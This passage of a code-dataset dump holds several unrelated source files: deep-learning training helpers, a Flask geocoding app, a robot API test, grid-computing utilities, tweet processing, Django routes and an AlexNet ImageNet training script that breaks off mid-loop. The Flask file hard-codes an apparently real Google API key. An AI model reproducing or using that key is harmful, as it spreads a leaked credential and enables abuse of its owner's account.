        score *= math.pow(num_matches / (len_pred - n + 1), math.pow(0.5, n))
    return score
def train_2d(trainer, steps=20, f_grad=None):  #@save
    """Optimize a 2D objective with a caller-supplied trainer.

    ``trainer`` maps (x1, x2, s1, s2[, f_grad]) to the updated tuple;
    s1/s2 are opaque optimizer state. Returns the list of visited
    (x1, x2) points, including the fixed starting point (-5, -2).
    """
    x1, x2 = -5, -2
    s1 = s2 = 0  # optimizer-internal state, threaded through each call
    results = [(x1, x2)]
    for i in range(steps):
        extra = (f_grad,) if f_grad else ()
        x1, x2, s1, s2 = trainer(x1, x2, s1, s2, *extra)
        results.append((x1, x2))
    # Report only the final iterate.
    print(f'epoch {i + 1}, x1: {float(x1):f}, x2: {float(x2):f}')
    return results
def show_trace_2d(f, results):  #@save
    """Show the trace of 2D variables during optimization.

    Draws the visited (x1, x2) points from ``results`` as a connected
    dotted line over a contour plot of the objective ``f``. Relies on
    module-level ``plt`` and ``set_figsize`` (d2l plotting helpers).
    """
    set_figsize()
    # Optimizer trajectory.
    plt.plot(*zip(*results), '-o', color='#ff7f0e')
    # NOTE(review): torch.meshgrid without indexing= uses 'ij' and warns on
    # recent PyTorch — confirm the intended indexing convention.
    x1, x2 = torch.meshgrid(torch.arange(-5.5, 1.0, 0.1),torch.arange(-3.0, 1.0, 0.1))
    plt.contour(x1, x2, f(x1, x2), colors='#1f77b4')
    plt.xlabel('x1')
def linreg(X, w, b):
    """The linear regression model: ``y_hat = X @ w + b``."""
    prediction = torch.matmul(X, w)
    return prediction + b
def squared_loss(y_hat, y):
    """Elementwise halved squared error; ``y`` is reshaped to match ``y_hat``."""
    diff = y_hat - torch.reshape(y, y_hat.shape)
    return diff ** 2 / 2
def evaluate_loss(net, data_iter, loss):
    """Average of ``loss`` over every example produced by ``data_iter``."""
    metric = Accumulator(2)  # (running loss sum, running example count)
    for X, y in data_iter:
        predictions = net(X)
        l = loss(predictions, torch.reshape(y, predictions.shape))
        metric.add(torch.sum(l), l.numel())
    return metric[0] / metric[1]
def get_data(batch_size=10, n=1500):
    """Load and standardize the airfoil dataset.

    Returns (data iterator over the first ``n`` rows, number of features).
    """
    raw = np.genfromtxt(download('airfoil'),
                        dtype=np.float32, delimiter='\t')
    # Column-wise standardization before converting to a torch tensor.
    standardized = torch.from_numpy((raw - raw.mean(axis=0)) / raw.std(axis=0))
    data_iter = load_array((standardized[:n, :-1], standardized[:n, -1]),
                           batch_size, is_train=True)
    return data_iter, standardized.shape[1] - 1
# %%
def sgd(params, states, hyperparams):
    """One minibatch-SGD step: p <- p - lr * p.grad, then zero the gradient.

    ``states`` is unused (kept for the shared trainer_fn signature).
    """
    lr = hyperparams['lr']
    for param in params:
        param.data.sub_(lr * param.grad)
        param.grad.data.zero_()
# %%
def train_ch11(trainer_fn, states, hyperparams, data_iter,
               feature_dim, num_epochs=2):
    """Train a from-scratch linear-regression model with a custom optimizer.

    ``trainer_fn(params, states, hyperparams)`` performs one update step
    and is expected to zero the gradients itself (as ``sgd`` above does).
    Returns (cumulative step times, recorded full-dataset losses).
    Relies on d2l helpers ``Animator`` and ``Timer``.
    """
    # Initialization
    w = torch.normal(mean=0.0, std=0.01, size=(feature_dim, 1),
                     requires_grad=True)
    b = torch.zeros((1), requires_grad=True)
    net, loss = lambda X: linreg(X, w, b), squared_loss
    # Train
    animator = Animator(xlabel='epoch', ylabel='loss',
                        xlim=[0, num_epochs], ylim=[0.22, 0.35])
    n, timer = 0, Timer()
    for _ in range(num_epochs):
        for X, y in data_iter:
            l = loss(net(X), y).mean()
            l.backward()
            trainer_fn([w, b], states, hyperparams)
            n += X.shape[0]
            # Every 200 examples: pause the timer and log the loss over
            # the full dataset (evaluation time is excluded from timing).
            if n % 200 == 0:
                timer.stop()
                animator.add(n/X.shape[0]/len(data_iter),
                             (evaluate_loss(net, data_iter, loss),))
                timer.start()
    print(f'loss: {animator.Y[0][-1]:.3f}, {timer.avg():.3f} sec/epoch')
    return timer.cumsum(), animator.Y[0]
# %%
def train_concise_ch11(trainer_fn, hyperparams, data_iter, num_epochs=4):
    """Train a one-layer linear net with a built-in torch optimizer.

    ``trainer_fn`` is an optimizer class (e.g. torch.optim.SGD) that is
    constructed with ``hyperparams``. The input is assumed to have 5
    features (matches ``get_data`` above).
    """
    # Initialization
    net = nn.Sequential(nn.Linear(5, 1))
    def init_weights(m):
        if type(m) == nn.Linear:
            torch.nn.init.normal_(m.weight, std=0.01)
    net.apply(init_weights)
    optimizer = trainer_fn(net.parameters(), **hyperparams)
    loss = nn.MSELoss()
    # Note: L2 Loss = 1/2 * MSE Loss. PyTorch has MSE Loss which is slightly
    # different from MXNet's L2Loss by a factor of 2. Hence we halve the loss
    # value to get L2Loss in PyTorch
    animator = Animator(xlabel='epoch', ylabel='loss',
                        xlim=[0, num_epochs], ylim=[0.22, 0.35])
    n, timer = 0, Timer()
    for _ in range(num_epochs):
        for X, y in data_iter:
            optimizer.zero_grad()
            out = net(X)
            y = y.reshape(out.shape)
            l = loss(out, y)/2
            l.backward()
            optimizer.step()
            n += X.shape[0]
            # Every 200 examples: log the (halved) full-dataset loss,
            # excluding evaluation from the timing.
            if n % 200 == 0:
                timer.stop()
                animator.add(n/X.shape[0]/len(data_iter),
                             (evaluate_loss(net, data_iter, loss)/2,))
                timer.start()
    print(f'loss: {animator.Y[0][-1]:.3f}, {timer.avg():.3f} sec/epoch')
|
15,148 | dfbe89c2de7569e495b4c535430c4d0f5f743bca | #!flask/bin/python
from locLib import *
def concept2Indexes(concepts, vocabulary, maxConceptCount):
    '''
    concept2Indexes - map each concept to its vocabulary index.

    Input:
        concepts - iterable of concept strings
        vocabulary - dict mapping concept -> index
        maxConceptCount - total number of concepts kept from the vocabulary
    Output:
        list of indexes; a concept that is missing from the vocabulary, or
        whose index is not below maxConceptCount, maps to 0.
    '''
    indexes = []
    for concept in concepts:
        # Missing concepts get the sentinel maxConceptCount, which the
        # range check below turns into 0 — same as out-of-range indexes.
        index = vocabulary.get(concept, maxConceptCount)
        indexes.append(index if index < maxConceptCount else 0)
    return indexes
def changeXTo01(trainVector, conceptsCount):
    '''
    changeXTo01 - build a bag-of-words vector (one short index vector is
    expanded into a 0/1 vector).

    Input:
        trainVector - iterable of concept indexes
        conceptsCount - length of the concept library
    Output:
        numpy array of length conceptsCount with 1.0 at each listed index
    '''
    bag = np.zeros(conceptsCount)
    for index in trainVector:
        bag[index] = 1
    return bag
def changeSetTo01(trainSet, conceptsCount):
    '''
    changeSetTo01 - vectorize a whole training/validation set into a
    bag-of-words matrix (each short index vector becomes a 0/1 row).

    Input:
        trainSet - iterable of index vectors
        conceptsCount - length of the concept library
    Output:
        numpy array of shape (len(trainSet), conceptsCount)
    '''
    return np.array([changeXTo01(vector, conceptsCount) for vector in trainSet])
|
15,149 | 47af12290701dfa4c90a605d4a9557bce238626a | import logging
import requests
from flask import Flask, render_template, request
app = Flask(__name__)
# api-endpoint for the Google Geocoding API.
# NOTE(review): the API key is hard-coded in source (and therefore public) —
# move it to configuration/an environment variable and rotate the key.
url = "https://maps.googleapis.com/maps/api/geocode/json?key=AIzaSyA_wOxjHNfPhmKu2zBo8N5HXsEpewgIQF0"
# [START form]
@app.route('/')
def index():
    # Serve the location search form.
    return render_template('form.html')
# [END form]
# [START result]
@app.route('/result', methods=['POST', 'GET'])
def api_message():
    """Geocode the submitted 'location' form field and render the result.

    Renders result.html with passed="no" and an error message when the
    Geocoding API returns a non-OK status; otherwise passes the first
    candidate's place_id and lat/lng coordinates.
    """
    locate = request.form.get('location', None)
    payload = {'address': locate}
    response = requests.get(url=url, params=payload)
    data = response.json()
    if data['status'] != 'OK':
        # Fixed: `print "Error"` was Python 2-only syntax (SyntaxError on 3.x);
        # the parenthesized form works on both 2 and 3.
        print("Error")
        error = "Search came up with no results. Try Again."
        return render_template(
            'result.html',
            passed="no",
            message=error
        )
    else:
        # First geocoding candidate. (Renamed local: `id` shadowed the builtin.)
        result = data['results'][0]
        return render_template(
            'result.html',
            passed="yes",
            id=result["place_id"],
            latitude=result['geometry']['location']['lat'],
            longitude=result['geometry']['location']['lng']
        )
# [END result]
# Fixed: the 500 handler must be registered BEFORE app.run() — app.run()
# blocks, so a handler defined after it was never active when the module
# ran as a script.
@app.errorhandler(500)
def server_error(e):
    """Log the error (with stacktrace) and return a generic 500 response."""
    logging.exception('An error occurred during a request.')
    return 'An internal error occurred.', 500


if __name__ == '__main__':
    app.run(debug=True)
|
15,150 | 479ed5be2d1194d0f89d0f1cd76ab7fb21c7ef26 | # Copyright 2019 Jan Feitsma (Falcons)
# SPDX-License-Identifier: Apache-2.0
from robotScenarioBase import *
def testRobotInterface():
    """
    A series of tests to check if all functionality provided by robotInterface works.

    Smoke-tests the Python 2 `robot` API from robotScenarioBase end to end:
    world-state queries, ballhandler control, velocity/move setpoints and
    team information. Bare `print` statements emit blank separator lines.
    """
    print
    print "TEST: simulation environment"
    print "isSimulated =", robot.isSimulated()
    print
    print "TEST: shutdown flag"
    print "isShutDown =", robot.isShutDown()
    assert(robot.isShutDown() == False)
    print
    print "TEST: own robot ID"
    print robot.myRobotId()
    print
    print "TEST: stop (nothing should happen)"
    robot.stop()
    print
    print "TEST: enable ballHandlers"
    robot.enableBallHandlers()
    sleep(1)
    print
    print "TEST: disable ballHandlers"
    robot.disableBallHandlers()
    sleep(1)
    print
    print "TEST: velocity setpoint (half rotation)"
    robot.setVelocity(0, 0, 1, 3.14)
    print
    print "TEST: get current position"
    pos = robot.getPosition()
    print "position =", pos
    print
    print "TEST: get current velocity"
    vel = robot.getVelocity()
    print "velocity =", vel
    print
    print "TEST: move a bit"
    robot.move(pos.x, pos.y + 0.5, pos.Rz)
    print
    print "TEST: which robots are active"
    print robot.activeRobots()
    print
    print "TEST: teammembers are all robots except self"
    teamMembers = robot.teamMembers()
    print teamMembers
    assert(robot.myRobotId() not in teamMembers)
    print
    print "TEST: relative index"
    print robot.myRelIndex()
    print
    print "TEST: ball possession as enum"
    print robot.ballPossession()
    print
    print "TEST: ball possession as boolean"
    print robot.hasBall()
    print
    print "TEST: does team see a ball"
    print robot.seeBall()
    print
    print "TEST: closest obstacle"
    print robot.findClosestObstacle(1, 6)
    print
    print "TEST: robot close to penalty spot"
    print (robot.robotCloseBy(0, 6, 2.0) or robot.robotCloseBy(0, -6, 2.0))
    print
    # Ball-dependent checks only run when the team currently sees a ball.
    if robot.seeBall():
        print "TEST: ball position"
        print robot.ballPosition()
        print
        print "TEST: ball velocity"
        print robot.ballVelocity()
        print
        print "TEST: ball on same half"
        print robot.ballOnSameHalf()
        print
        print "TEST: ball close to penalty spot"
        print (robot.ballCloseBy(0, 6, 2.0) or robot.ballCloseBy(0, -6, 2.0))
        print
        print "TEST: get ball"
        robot.getBall()
        sleep(0.1) # give async wm thread a bit of time ...
        assert(robot.hasBall())
    print
|
15,151 | 89e9426b373a008045a8874c7447083be1f08959 | import hashlib
import subprocess
import os
from WMCore.Services.SiteDB.SiteDB import SiteDBJSON
from WMCore.Credential.Proxy import Proxy
__version__ = '1.0.3'
def getHashLfn(lfn):
    """
    Provide a hashed lfn from an lfn (SHA-224 hex digest).

    NOTE(review): on Python 3, hashlib requires bytes input — confirm
    callers pass bytes (this module targets Python 2, where str is bytes).
    """
    digest = hashlib.sha224(lfn)
    return digest.hexdigest()
def getFTServer(site, view, db, log):
    """
    Resolve the FTS server for ``site``'s country code via the
    asynctransfer_config couch view; return '' (and log) when the view
    has no row for that country.
    """
    country = site.split('_')[1]
    try:
        rows = db.loadView('asynctransfer_config', view, {'key': country})['rows']
        fts_server = rows[0]['value']
    except IndexError:
        log.info("FTS server for %s is down" % country)
        fts_server = ''
    return fts_server
def execute_command(command):
    """
    _execute_command_
    Run ``command`` through /bin/bash and return (stdout, stderr, returncode).
    """
    proc = subprocess.Popen(
        ["/bin/bash"], shell=True, cwd=os.environ['PWD'],
        stdout=subprocess.PIPE,
        stderr=subprocess.PIPE,
        stdin=subprocess.PIPE,
    )
    # Fixed: feed the command through communicate() instead of a raw
    # stdin.write() followed by communicate() — the old pattern left stdin
    # unflushed/open and can deadlock once the payload exceeds the pipe buffer.
    stdout, stderr = proc.communicate(command)
    rc = proc.returncode
    return stdout, stderr, rc
def getDNFromUserName(username, log, ckey = None, cert = None):
    """
    Resolve a user's DN from SiteDB; return '' (and log) when the user
    does not exist or SiteDB cannot be reached.
    """
    site_db = SiteDBJSON(config={'key': ckey, 'cert': cert})
    try:
        return site_db.userNameDn(username)
    except IndexError:
        log.error("user does not exist")
    except RuntimeError:
        log.error("SiteDB URL cannot be accessed")
    return ''
def getProxy(userdn, group, role, defaultDelegation, logger):
    """
    _getProxy_

    Return (True, proxyPath) when a proxy with >1h of lifetime exists, or
    after a successful myproxy renewal with any remaining lifetime;
    otherwise (False, None). ``group`` and ``role`` are currently unused.
    """
    # Fixed: the original called log.debug(...) but the parameter is named
    # `logger`, which raised NameError on every invocation.
    logger.debug("Retrieving proxy for %s" % userdn)
    proxy = Proxy(defaultDelegation)
    proxyPath = proxy.getProxyFilename( True )
    timeleft = proxy.getTimeLeft( proxyPath )
    if timeleft is not None and timeleft > 3600:
        return (True, proxyPath)
    proxyPath = proxy.logonRenewMyProxy()
    timeleft = proxy.getTimeLeft( proxyPath )
    if timeleft is not None and timeleft > 0:
        return (True, proxyPath)
    return (False, None)
|
15,152 | e82c825211875573ee33e9dc19cee1d5480b1103 | import json
from LocalDir import *
import pickle
from os import listdir
from os.path import isfile, join
# list of json files, in case of folders with multiple files
onlyFiles = [f for f in listdir(sourceDir) if isfile(join(sourceDir, f))]
print(sourceDir)
print(onlyFiles)
# Map of tweet id_str -> raw JSON line; sourceDir/twitterEncoding/
# rawTweetByIdDictFile come from `from LocalDir import *`.
allTweets = {}
failedRegex = 0
for file in onlyFiles:
    with open(sourceDir + file) as jsonFile:
        for line in jsonFile:
            try:
                # NOTE(review): json.loads' `encoding` kwarg is ignored on
                # Python 3 and removed in 3.9 — confirm the target runtime.
                tweet = json.loads(line, encoding=twitterEncoding)
                tweetID = tweet['id_str']
                allTweets[tweetID] = line
            # NOTE(review): bare except also swallows KeyError ('id_str'
            # missing) and even KeyboardInterrupt — consider narrowing.
            except:
                failedRegex += 1
print("failed json loads: " + str(failedRegex))
# Persist the id -> raw-line dict for downstream scripts.
with open(rawTweetByIdDictFile, 'wb') as f:
    pickle.dump(allTweets, f)
|
15,153 | 8c8279fd5577c9e59d007a018a5d6c50e1d7f5e9 | from django.urls import path
from . import views
# URL routes for the accounts app; route names are used by templates
# and redirects elsewhere in the project.
urlpatterns = [
    path('',views.home,name='home'),
    path('sign-up/',views.register,name='register'),
    path('sign-in/',views.login,name='login'),
    path('logout/',views.logout,name='logout'),
    path('user-details/',views.details,name='user-details'),
    path('delete-user/',views.delete_user,name='delete-user'),
    path('update-details/',views.update_details,name='update-details'),
]
# urlpatterns = [] |
15,154 | ab51a2be99aace11e4d6b79f22efcdd2c1bdd6ee |
import argparse
import os
import sys
##############################################
# Command-line configuration for the AlexNet/ImageNet run.
parser = argparse.ArgumentParser()
parser.add_argument('--epochs', type=int, default=100)
parser.add_argument('--batch_size', type=int, default=128)
parser.add_argument('--lr', type=float, default=1e-2)
parser.add_argument('--eps', type=float, default=1.)
parser.add_argument('--dropout', type=float, default=0.5)
parser.add_argument('--act', type=str, default='relu')
parser.add_argument('--bias', type=float, default=0.)
parser.add_argument('--gpu', type=int, default=0)
parser.add_argument('--dfa', type=int, default=0)
parser.add_argument('--sparse', type=int, default=0)
parser.add_argument('--rank', type=int, default=0)
parser.add_argument('--init', type=str, default="glorot_uniform")
parser.add_argument('--save', type=int, default=0)
parser.add_argument('--name', type=str, default="imagenet_alexnet")
parser.add_argument('--load', type=str, default=None)
args = parser.parse_args()
# Pin the process to the requested GPU before TensorFlow is imported below.
if args.gpu >= 0:
    os.environ["CUDA_DEVICE_ORDER"]="PCI_BUS_ID"
    os.environ["CUDA_VISIBLE_DEVICES"]=str(args.gpu)
# Machine-specific ImageNet locations (exxact box vs. scratch cluster).
exxact = 0
if exxact:
    val_path = '/home/bcrafton3/Data_SSD/ILSVRC2012/val/'
    train_path = '/home/bcrafton3/Data_SSD/ILSVRC2012/train/'
else:
    val_path = '/usr/scratch/bcrafton/ILSVRC2012/val/'
    train_path = '/usr/scratch/bcrafton/ILSVRC2012/train/'
val_labels = './imagenet_labels/validation_labels.txt'
train_labels = './imagenet_labels/train_labels.txt'
# Per-channel RGB means used to center images (no std normalization).
IMAGENET_MEAN = [123.68, 116.78, 103.94]
##############################################
import keras
import tensorflow as tf
import numpy as np
np.set_printoptions(threshold=1000)
from lib.Model import Model
from lib.Layer import Layer
from lib.ConvToFullyConnected import ConvToFullyConnected
from lib.FullyConnected import FullyConnected
from lib.Convolution import Convolution
from lib.MaxPool import MaxPool
from lib.Dropout import Dropout
from lib.FeedbackFC import FeedbackFC
from lib.FeedbackConv import FeedbackConv
from lib.Activation import Activation
from lib.Activation import Relu
##############################################
def in_top_k(x, y, k):
    """Per-example 0/1 indicator that label ``y`` is among the top-k of ``x``."""
    scores = tf.cast(x, dtype=tf.float32)
    labels = tf.cast(y, dtype=tf.int32)
    _, topk = tf.nn.top_k(input=scores, k=k)
    # Compare the label row-vector against each of the k transposed columns.
    hits = tf.cast(tf.equal(labels, tf.transpose(topk)), dtype=tf.int32)
    return tf.reduce_sum(hits, axis=0)
##############################################
# Preprocessing (for both training and validation):
# (1) Decode the image from jpg format
# (2) Resize the image so its smaller side is 256 pixels long
def parse_function(filename, label):
    """Read a JPEG from disk and resize it so its shorter side is 256 px.

    Aspect ratio is preserved; the 227x227 crop happens in the
    train/val preprocess steps below. Uses TF1 graph-mode ops.
    """
    image_string = tf.read_file(filename)
    image_decoded = tf.image.decode_jpeg(image_string, channels=3) # (1)
    image = tf.cast(image_decoded, tf.float32)
    smallest_side = 256.0
    height, width = tf.shape(image)[0], tf.shape(image)[1]
    height = tf.to_float(height)
    width = tf.to_float(width)
    # Scale factor mapping the smaller dimension to exactly 256.
    scale = tf.cond(tf.greater(height, width),
                    lambda: smallest_side / width,
                    lambda: smallest_side / height)
    new_height = tf.to_int32(height * scale)
    new_width = tf.to_int32(width * scale)
    resized_image = tf.image.resize_images(image, [new_height, new_width]) # (2)
    return resized_image, label
# Preprocessing (for training)
# (3) Take a random 227x227 crop to the scaled image
# (4) Horizontally flip the image with probability 1/2
# (5) Substract the per color mean `IMAGENET_MEAN`
# Note: we don't normalize the data here, as VGG was trained without normalization
def train_preprocess(image, label):
    """Training augmentation: random 227x227 crop, random horizontal flip,
    then per-channel IMAGENET_MEAN subtraction (no std normalization)."""
    crop_image = tf.random_crop(image, [227, 227, 3]) # (3)
    flip_image = tf.image.random_flip_left_right(crop_image) # (4)
    means = tf.reshape(tf.constant(IMAGENET_MEAN), [1, 1, 3])
    centered_image = flip_image - means # (5)
    return centered_image, label
# Preprocessing (for validation)
# (3) Take a central 227x227 crop to the scaled image
# (4) Substract the per color mean `IMAGENET_MEAN`
# Note: we don't normalize the data here, as VGG was trained without normalization
def val_preprocess(image, label):
    """Validation preprocessing: deterministic central 227x227 crop plus
    per-channel IMAGENET_MEAN subtraction (mirrors train_preprocess
    without the random augmentation)."""
    crop_image = tf.image.resize_image_with_crop_or_pad(image, 227, 227) # (3)
    means = tf.reshape(tf.constant(IMAGENET_MEAN), [1, 1, 3])
    centered_image = crop_image - means # (4)
    return centered_image, label
##############################################
def get_validation_dataset():
    """Return (sorted image paths, labels) for the validation set, trimmed
    so the count is a whole multiple of args.batch_size.

    Labels are read one per line from val_labels, in sorted-filename order.
    """
    validation_images = []
    validation_labels = []
    print ("building validation dataset")
    for subdir, dirs, files in os.walk(val_path):
        for file in files:
            validation_images.append(os.path.join(val_path, file))
    validation_images = sorted(validation_images)
    # Fixed: close the labels file instead of leaking the handle.
    with open(val_labels) as validation_labels_file:
        lines = validation_labels_file.readlines()
    for ii in range(len(lines)):
        validation_labels.append(int(lines[ii]))
    # Fixed: when len % batch_size == 0 the old unconditional slice
    # [:-0] == [:0] silently emptied both lists.
    remainder = len(validation_labels) % args.batch_size
    if remainder:
        validation_images = validation_images[:(-remainder)]
        validation_labels = validation_labels[:(-remainder)]
    return validation_images, validation_labels
def get_train_dataset():
    """Return (image paths, labels) for the training set, trimmed so the
    count is a whole multiple of args.batch_size.

    Class ids are assigned in train_labels file order: line i's first
    whitespace-separated token (the synset folder name) gets label i.
    """
    training_images = []
    training_labels = []
    labels = {}
    # Fixed: read the label map with a context manager (no leaked handle).
    with open(train_labels, 'r') as f:
        for label_counter, line in enumerate(f):
            labels[line.split(' ')[0]] = label_counter
    print ("building train dataset")
    for subdir, dirs, files in os.walk(train_path):
        for folder in dirs:
            for folder_subdir, folder_dirs, folder_files in os.walk(os.path.join(subdir, folder)):
                for file in folder_files:
                    training_images.append(os.path.join(folder_subdir, file))
                    training_labels.append(labels[folder])
    # Fixed: when len % batch_size == 0 the old unconditional slice
    # [:-0] == [:0] silently emptied both lists.
    remainder = len(training_labels) % args.batch_size
    if remainder:
        training_images = training_images[:(-remainder)]
        training_labels = training_labels[:(-remainder)]
    return training_images, training_labels
###############################################################
# Feedable placeholders: the same (filename, label) tensors back both the
# train and val tf.data pipelines; actual lists are fed at initializer time.
filename = tf.placeholder(tf.string, shape=[None])
label = tf.placeholder(tf.int64, shape=[None])
###############################################################
val_imgs, val_labs = get_validation_dataset()
val_dataset = tf.data.Dataset.from_tensor_slices((filename, label))
val_dataset = val_dataset.shuffle(len(val_imgs))
val_dataset = val_dataset.map(parse_function, num_parallel_calls=4)
val_dataset = val_dataset.map(val_preprocess, num_parallel_calls=4)
val_dataset = val_dataset.batch(args.batch_size)
val_dataset = val_dataset.repeat()
val_dataset = val_dataset.prefetch(8)
###############################################################
train_imgs, train_labs = get_train_dataset()
train_dataset = tf.data.Dataset.from_tensor_slices((filename, label))
train_dataset = train_dataset.shuffle(len(train_imgs))
train_dataset = train_dataset.map(parse_function, num_parallel_calls=4)
train_dataset = train_dataset.map(train_preprocess, num_parallel_calls=4)
train_dataset = train_dataset.batch(args.batch_size)
train_dataset = train_dataset.repeat()
train_dataset = train_dataset.prefetch(8)
###############################################################
# One feedable iterator serves both datasets; the string handle fed at
# sess.run time selects train vs. val.
handle = tf.placeholder(tf.string, shape=[])
iterator = tf.data.Iterator.from_string_handle(handle, train_dataset.output_types, train_dataset.output_shapes)
features, labels = iterator.get_next()
features = tf.reshape(features, (-1, 227, 227, 3))
labels = tf.one_hot(labels, depth=1000)
train_iterator = train_dataset.make_initializable_iterator()
val_iterator = val_dataset.make_initializable_iterator()
###############################################################
# Activation chosen from the CLI.
if args.act == 'tanh':
    # NOTE(review): Tanh is never imported above (only Activation and Relu
    # are), so --act=tanh raises NameError — import lib.Activation.Tanh.
    act = Tanh()
elif args.act == 'relu':
    act = Relu()
else:
    assert(False)
###############################################################
# Pretrained-weight sources; a section is trainable only when no weights
# file is supplied for it (conv layers here load from the transfer file).
weights_conv = './transfer/alexnet_weights.npy'
weights_fc = None
# Fixed: compare against None with `is` (PEP 8 E711), not `==`.
train_conv = weights_conv is None
train_fc = weights_fc is None
###############################################################
# Runtime-fed hyperparameters (batch size, dropout rate, learning rate).
batch_size = tf.placeholder(tf.int32, shape=())
dropout_rate = tf.placeholder(tf.float32, shape=())
lr = tf.placeholder(tf.float32, shape=())
###############################################################
# AlexNet: 5 conv blocks + 3 FC layers. The Feedback* layers hold the
# (optionally sparse / low-rank) feedback weights used when --dfa=1.
l0 = Convolution(input_shape=[batch_size, 227, 227, 3], filter_sizes=[11, 11, 3, 96], init=args.init, strides=[1,4,4,1], padding="VALID", activation=act, bias=args.bias, load=weights_conv, name='conv1', train=train_conv)
l1 = MaxPool(size=[batch_size, 55, 55, 96], ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1], padding="VALID")
l2 = FeedbackConv(size=[batch_size, 27, 27, 96], num_classes=1000, sparse=args.sparse, rank=args.rank, name='conv1_fb')
l3 = Convolution(input_shape=[batch_size, 27, 27, 96], filter_sizes=[5, 5, 96, 256], init=args.init, activation=act, bias=args.bias, load=weights_conv, name='conv2', train=train_conv)
l4 = MaxPool(size=[batch_size, 27, 27, 256], ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1], padding="VALID")
l5 = FeedbackConv(size=[batch_size, 13, 13, 256], num_classes=1000, sparse=args.sparse, rank=args.rank, name='conv2_fb')
l6 = Convolution(input_shape=[batch_size, 13, 13, 256], filter_sizes=[3, 3, 256, 384], init=args.init, activation=act, bias=args.bias, load=weights_conv, name='conv3', train=train_conv)
l7 = FeedbackConv(size=[batch_size, 13, 13, 384], num_classes=1000, sparse=args.sparse, rank=args.rank, name='conv3_fb')
l8 = Convolution(input_shape=[batch_size, 13, 13, 384], filter_sizes=[3, 3, 384, 384], init=args.init, activation=act, bias=args.bias, load=weights_conv, name='conv4', train=train_conv)
l9 = FeedbackConv(size=[batch_size, 13, 13, 384], num_classes=1000, sparse=args.sparse, rank=args.rank, name='conv4_fb')
l10 = Convolution(input_shape=[batch_size, 13, 13, 384], filter_sizes=[3, 3, 384, 256], init=args.init, activation=act, bias=args.bias, load=weights_conv, name='conv5', train=train_conv)
l11 = MaxPool(size=[batch_size, 13, 13, 256], ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1], padding="VALID")
l12 = FeedbackConv(size=[batch_size, 6, 6, 256], num_classes=1000, sparse=args.sparse, rank=args.rank, name='conv5_fb')
l13 = ConvToFullyConnected(input_shape=[6, 6, 256])
l14 = FullyConnected(input_shape=6*6*256, size=4096, init=args.init, activation=act, bias=args.bias, load=weights_fc, name='fc1', train=train_fc)
l15 = Dropout(rate=dropout_rate)
l16 = FeedbackFC(size=[6*6*256, 4096], num_classes=1000, sparse=args.sparse, rank=args.rank, name='fc1_fb')
l17 = FullyConnected(input_shape=4096, size=4096, init=args.init, activation=act, bias=args.bias, load=weights_fc, name='fc2', train=train_fc)
l18 = Dropout(rate=dropout_rate)
l19 = FeedbackFC(size=[4096, 4096], num_classes=1000, sparse=args.sparse, rank=args.rank, name='fc2_fb')
l20 = FullyConnected(input_shape=4096, size=1000, init=args.init, bias=args.bias, load=weights_fc, name='fc3', train=train_fc)
###############################################################
model = Model(layers=[l0, l1, l2, l3, l4, l5, l6, l7, l8, l9, l10, l11, l12, l13, l14, l15, l16, l17, l18, l19, l20])
predict = tf.nn.softmax(model.predict(X=features))
weights = model.get_weights()
# Gradients: direct feedback alignment when --dfa=1, else standard backprop.
if args.dfa:
    grads_and_vars = model.dfa_gvs(X=features, Y=labels)
else:
    grads_and_vars = model.gvs(X=features, Y=labels)
train = tf.train.AdamOptimizer(learning_rate=lr, epsilon=args.eps).apply_gradients(grads_and_vars=grads_and_vars)
# Per-batch top-1 and top-5 correct counts.
correct = tf.equal(tf.argmax(predict,1), tf.argmax(labels,1))
total_correct = tf.reduce_sum(tf.cast(correct, tf.float32))
top5 = in_top_k(predict, tf.argmax(labels,1), k=5)
total_top5 = tf.reduce_sum(tf.cast(top5, tf.float32))
###############################################################
config = tf.ConfigProto(allow_soft_placement=True)
config.gpu_options.allow_growth=True
sess = tf.Session(config=config)
sess.run(tf.global_variables_initializer())
# String handles select which pipeline the shared feedable iterator reads.
train_handle = sess.run(train_iterator.string_handle())
val_handle = sess.run(val_iterator.string_handle())
###############################################################
# Results log: one file per run; header with run name and parameter count.
results_filename = args.name + '.results'
f = open(results_filename, "w")
f.write(results_filename + "\n")
f.write("total params: " + str(model.num_params()) + "\n")
f.close()
###############################################################
# Per-epoch accuracy history plus manual learning-rate-decay state.
train_accs = []
train_accs_top5 = []
val_accs = []
val_accs_top5 = []
phase = 0
lr_decay = args.lr
# Main loop: one pass over train, then val, per epoch, followed by a simple
# 3-phase learning-rate decay schedule driven by the val-accuracy delta.
for ii in range(args.epochs):
    sess.run(train_iterator.initializer, feed_dict={filename: train_imgs, label: train_labs})
    train_total = 0.0
    train_correct = 0.0
    train_top5 = 0.0
    for j in range(0, len(train_imgs), args.batch_size):
        [_total_correct, _top5, _] = sess.run([total_correct, total_top5, train], feed_dict={handle: train_handle, batch_size: args.batch_size, dropout_rate: args.dropout, lr: lr_decay})
        train_total += args.batch_size
        train_correct += _total_correct
        train_top5 += _top5
        train_acc = train_correct / train_total
        train_acc_top5 = train_top5 / train_total
        # Progress report every 1000 batches (and on the first batch).
        if (j % (1000 * args.batch_size) == 0):
            p = "train accuracy: %f %f" % (train_acc, train_acc_top5)
            print (p)
            f = open(results_filename, "a")
            f.write(p + "\n")
            f.close()
    train_accs.append(train_acc)
    train_accs_top5.append(train_acc_top5)
    ##################################################################
    # Validation pass: dropout disabled, no optimizer step.
    sess.run(val_iterator.initializer, feed_dict={filename: val_imgs, label: val_labs})
    val_total = 0.0
    val_correct = 0.0
    val_top5 = 0.0
    for j in range(0, len(val_imgs), args.batch_size):
        [_total_correct, _top5] = sess.run([total_correct, total_top5], feed_dict={handle: val_handle, batch_size: args.batch_size, dropout_rate: 0.0, lr: 0.0})
        val_total += args.batch_size
        val_correct += _total_correct
        val_top5 += _top5
        val_acc = val_correct / val_total
        val_acc_top5 = val_top5 / val_total
        if (j % (1000 * args.batch_size) == 0):
            p = "val accuracy: %f %f" % (val_acc, val_acc_top5)
            print (p)
            f = open(results_filename, "a")
            f.write(p + "\n")
            f.close()
    val_accs.append(val_acc)
    val_accs_top5.append(val_acc_top5)
    # Decay the learning rate when epoch-over-epoch val improvement stalls.
    if phase == 0:
        phase = 1
        print ('phase 1')
    elif phase == 1:
        dacc = val_accs[-1] - val_accs[-2]
        if dacc <= 0.01:
            lr_decay = 0.1 * args.lr
            phase = 2
            print ('phase 2')
    elif phase == 2:
